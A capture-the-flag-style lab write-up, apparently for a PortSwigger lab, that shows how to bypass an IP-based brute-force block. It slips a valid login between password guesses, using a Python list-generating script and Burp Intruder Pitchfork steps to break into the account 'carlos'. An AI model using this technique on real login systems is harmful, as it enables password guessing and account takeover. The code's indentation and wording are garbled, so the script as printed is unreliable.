This lab is vulnerable due to a logic flaw in its password brute-force protection. To solve the lab, brute-force the victim’s password, then log in and access their account page.
- Your credentials:
wiener:peter - Victim’s username:
carlos - Candidate passwords
Lab: Broken brute-force protection, IP block
- First we will try to login using
wiener:peter - Now we will try to login using
carlosusername and a random password. After 3 fail attempt in a strip we should wait for a minute. - After 2 fail login attempt if we use valid login info like
wiener:peterwe can continue the brute-force attack.
print("###username#######################################")
for i in range(150):
if i % 3:
print("carlos")
else:
print("wiener")
print("###password#######################################")
with open('pass.txt', 'r') as f:
liles = f.readlines()
i = 0
for pwd in liles:
if i % 3:
print(pwd.strip("\n"))
else:
print("peter")
print(pwd.strip('\n'))
i = i + 1
i = i + 1
- Put the passwords in the
pass.txtfile and this 2 file in a same folder. - Now Use the username and password list from the code.
- Go to Resource pool and set it to 1
- now make Pitchfork attack.
mustang(Change every-time) this password return 302 status code. it is the password- Login with the username and password